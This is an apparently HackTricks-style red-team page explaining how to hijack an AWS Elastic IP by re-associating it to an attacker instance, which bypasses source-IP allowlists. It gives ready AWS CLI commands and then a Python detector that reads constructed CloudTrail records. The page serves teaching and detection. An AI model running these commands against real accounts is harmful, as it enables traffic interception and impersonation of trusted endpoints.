AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Summary
Abuse `ec2:AssociateAddress` (and optionally `ec2:DisassociateAddress`) to re-associate an Elastic IP (EIP) from a victim instance/ENI to an attacker-controlled instance/ENI in the same account. Inbound traffic destined to the EIP is then delivered to the attacker, and the attacker can originate outbound traffic from the allowlisted public IP, bypassing external partner firewalls that filter on source IP.
Prerequisites
- Target EIP allocation ID (`eipalloc-...`) in the same account and region.
- Attacker instance/ENI you control, in a subnet with a route to an internet gateway and with a security group that allows the inbound traffic you want to receive (otherwise the moved EIP delivers nothing).
- Permissions:
  - `ec2:DescribeAddresses` to enumerate EIPs and their current associations.
  - `ec2:AssociateAddress` on the target EIP allocation (elastic-ip resource) and on the attacker instance/ENI.
  - `ec2:DisassociateAddress` (optional): only needed if you want to detach the EIP from the victim in a separate call. With `--allow-reassociation`, `AssociateAddress` detaches the EIP from its previous instance/ENI by itself; passing `--no-allow-reassociation` instead makes the call fail if the EIP is already associated elsewhere.
Attack
Variables (replace the placeholders with your IDs):
```bash
REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>
```
- Allocate or identify the victim's EIP. The lab allocates a fresh one and attaches it to the victim; against a real target, list addresses with `aws ec2 describe-addresses` and take the `AllocationId` whose `InstanceId`/`NetworkInterfaceId` belongs to the victim.
```bash
ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query 'Addresses[0].PublicIp' --output text)
```
- Verify the EIP currently resolves to the victim service (the example checks for a banner string):
```bash
curl -sS http://$EIP | grep -i victim
```
- Re-associate the EIP to the attacker instance (auto-disassociates it from the victim):
```bash
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION
```
- Verify the EIP now resolves to the attacker service (the new association takes a few seconds to take effect):
```bash
sleep 5; curl -sS http://$EIP | grep -i attacker
```
Evidence (moved association): the `AssociationId` has changed and the `InstanceId` is now the attacker's.
```bash
aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
  --query 'Addresses[0].[AssociationId,InstanceId,NetworkInterfaceId]' --output text
```
Impact
- Inbound impersonation: all traffic to the hijacked EIP is delivered to the attacker instance/ENI, including connections from clients and partners whose DNS records or allowlists are pinned to that address. Delivery is still subject to the attacker instance's security group and subnet NACLs.
- Outbound impersonation: the attacker can initiate traffic that appears to originate from the allowlisted public IP (useful to bypass partner/external source-IP filters), because the EIP becomes the source address of the attacker instance's traffic through the internet gateway.
- Side effect: the victim loses the address, so its service becomes unreachable on that IP (an availability signal defenders may notice), and the move is recorded as an `AssociateAddress` CloudTrail event for the allocation ID.
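Both ways of performing the hijack above (a single `AssociateAddress` with `--allow-reassociation`, or an explicit `DisassociateAddress` followed by `AssociateAddress`) are recorded by CloudTrail as `ec2.amazonaws.com` events. The script below is an added example for this page, not HackTricks code: it replays such records in time order, remembers where each allocation ID was last attached, and reports every association that moves an EIP to a different instance/ENI, naming the previous and new target and principal. The records are constructed; their field names follow CloudTrail's layout for EC2 events (`requestParameters.allocationId`, `instanceId`/`networkInterfaceId`, `allowReassociation`, `responseElements.associationId`), which you should confirm against your own logs, and the ARNs and resource IDs are made up.

```python
"""Detect Elastic IP (EIP) re-association in CloudTrail records.

Replays AssociateAddress / DisassociateAddress events in time order, remembers
where each allocationId was last attached, and reports every AssociateAddress
that moves the EIP to a different instance/ENI. The first association of an
allocationId is treated as the baseline and is never reported.
"""
import json

# Constructed sample data (not real logs). Field names follow CloudTrail's EC2
# event layout as assumed in the lead-in; ARNs and resource IDs are made up.
DEPLOYER = "arn:aws:iam::111122223333:user/deployer"
CI_ROLE = "arn:aws:sts::111122223333:assumed-role/ci-runner/build-42"
ALLOC_A = "eipalloc-0a1b2c3d4e5f60001"
ALLOC_B = "eipalloc-0a1b2c3d4e5f60002"


def _ev(time, name, actor, params, assoc_id=None):
    """Build a minimal CloudTrail-like record for the constructed sample."""
    return {"eventTime": time, "eventName": name, "userIdentity": {"arn": actor},
            "requestParameters": params,
            "responseElements": {"associationId": assoc_id} if assoc_id else None}


SAMPLE_EVENTS = [  # deliberately not in time order; the detector sorts by eventTime
    _ev("2024-05-01T10:00:00Z", "AssociateAddress", DEPLOYER,
        {"allocationId": ALLOC_A, "instanceId": "i-0victim00000000001", "allowReassociation": False},
        "eipassoc-0aaa000000000001"),
    # hijack path 1: one call with --allow-reassociation steals ALLOC_A
    _ev("2024-05-01T11:30:00Z", "AssociateAddress", CI_ROLE,
        {"allocationId": ALLOC_A, "instanceId": "i-0attacker000000001", "allowReassociation": True},
        "eipassoc-0aaa000000000002"),
    _ev("2024-05-01T10:05:00Z", "AssociateAddress", DEPLOYER,
        {"allocationId": ALLOC_B, "instanceId": "i-0web00000000000001", "allowReassociation": False},
        "eipassoc-0bbb000000000001"),
    # hijack path 2: explicit DisassociateAddress, then associate ALLOC_B to an attacker ENI
    _ev("2024-05-01T12:00:00Z", "DisassociateAddress", CI_ROLE,
        {"associationId": "eipassoc-0bbb000000000001"}),
    _ev("2024-05-01T12:01:00Z", "AssociateAddress", CI_ROLE,
        {"allocationId": ALLOC_B, "networkInterfaceId": "eni-0attacker00000001", "allowReassociation": False},
        "eipassoc-0bbb000000000002"),
    _ev("2024-05-01T12:02:00Z", "DescribeAddresses", DEPLOYER, None),  # unrelated, ignored
]


def detect_eip_moves(events):
    """Return one finding per AssociateAddress that moved an EIP to a new instance/ENI."""
    attached = {}        # allocationId -> {"target", "actor", "detached"}
    assoc_to_alloc = {}  # associationId -> allocationId, to resolve DisassociateAddress
    findings = []
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        if ev.get("errorCode"):
            continue  # CloudTrail also logs failed calls; they moved nothing
        params = ev.get("requestParameters") or {}
        actor = (ev.get("userIdentity") or {}).get("arn", "<unknown>")
        if ev["eventName"] == "DisassociateAddress":
            alloc = assoc_to_alloc.get(params.get("associationId"))
            if alloc in attached:
                attached[alloc]["detached"] = True  # keep the old target for the next associate
            continue
        if ev["eventName"] != "AssociateAddress":
            continue
        alloc = params.get("allocationId")
        if not alloc:
            continue  # EC2-Classic style call by public IP; not a VPC EIP
        target = params.get("instanceId") or params.get("networkInterfaceId")
        prev = attached.get(alloc)
        if prev and prev["target"] != target:
            if params.get("allowReassociation"):
                method = "allowReassociation"
            elif prev["detached"]:
                method = "disassociate-then-associate"
            else:
                method = "unknown"
            findings.append({
                "allocationId": alloc, "eventTime": ev["eventTime"],
                "previousTarget": prev["target"], "newTarget": target,
                "previousActor": prev["actor"], "newActor": actor,
                "actorChanged": prev["actor"] != actor, "method": method,
            })
        attached[alloc] = {"target": target, "actor": actor, "detached": False}
        assoc_id = (ev.get("responseElements") or {}).get("associationId")
        if assoc_id:
            assoc_to_alloc[assoc_id] = alloc
    return findings


def detect_from_cloudtrail_json(text):
    """Run the detector over the body of a CloudTrail log file ({"Records": [...]})."""
    return detect_eip_moves(json.loads(text)["Records"])


if __name__ == "__main__":
    for finding in detect_eip_moves(SAMPLE_EVENTS):
        print(json.dumps(finding, indent=2))
```

Run against the constructed sample, it reports two moves: `ALLOC_A` taken from the victim instance in one `allowReassociation` call, and `ALLOC_B` detached and re-attached to an attacker ENI by the same CI role. The `actorChanged` field is what makes the finding actionable: a deployer re-homing its own EIP during a blue/green swap looks identical at the API level, so alert on moves where the principal differs from the one that made the previous association, or where the new target is not in an expected set.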